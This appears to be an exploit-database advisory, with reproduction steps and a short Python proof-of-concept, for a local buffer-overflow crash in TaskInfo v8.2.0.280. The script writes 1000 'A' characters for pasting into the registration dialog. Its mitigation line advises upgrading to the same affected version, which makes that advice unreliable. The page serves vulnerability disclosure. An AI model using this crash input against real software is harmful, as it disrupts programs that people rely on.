TaskInfo v8.2.0.280 - Denial of Service (PoC)

vendor:

TaskInfo

by:

Rafael Pedrero

7.5

CVSS

HIGH

Denial of Service (DoS) Local Buffer Overflow

120

CWE

Product Name: TaskInfo

Affected Version From: v8.2.0.280

Affected Version To: v8.2.0.280

Patch Exists: YES

Related CWE: N/A

CPE: a:iarsn:taskinfo:8.2.0.280

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows XP SP3

2019

TaskInfo v8.2.0.280 – Denial of Service (PoC)

TaskInfo v8.2.0.280 is vulnerable to a denial of service attack due to a local buffer overflow. An attacker can exploit this vulnerability by running TaskInfo.exe, copying the content of TaskInfo_Crash.txt to the clipboard, and then going to 'Help' - 'Registration' - 'Set or View Registration Information' and pasting the result in the 'New User Name:' and 'New Serial Number:' textbox. Clicking the OK button will cause a crash.

Mitigation:

Upgrade to the latest version of TaskInfo v8.2.0.280 or later.

Source

Exploit-DB raw data:

# Exploit Title: TaskInfo v8.2.0.280 - Denial of Service (PoC)
# Discovery by: Rafael Pedrero
# Discovery Date: 2019-01-30
# Vendor Homepage: http://www.iarsn.com/
# Software Link : http://www.iarsn.com/
# Tested Version: v8.2.0.280
# Tested on: Windows XP SP3
# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow

# Steps to Produce the Crash:
# 1.- Run TaskInfo.exe
# 2.- copy content TaskInfo_Crash.txt to clipboard (result from this python script)
# 3.- Go to "Help" - "Registration" - "Set or View Registration Information" and paste the result in the "New User Name:" and "New Serial Number:" textbox.
# 4.- Click in OK button and you will see a crash.


#!/usr/bin/env python


crash = "\x41" * 1000
f = open ("TaskInfo_Crash.txt", "w")
f.write(crash)
f.close()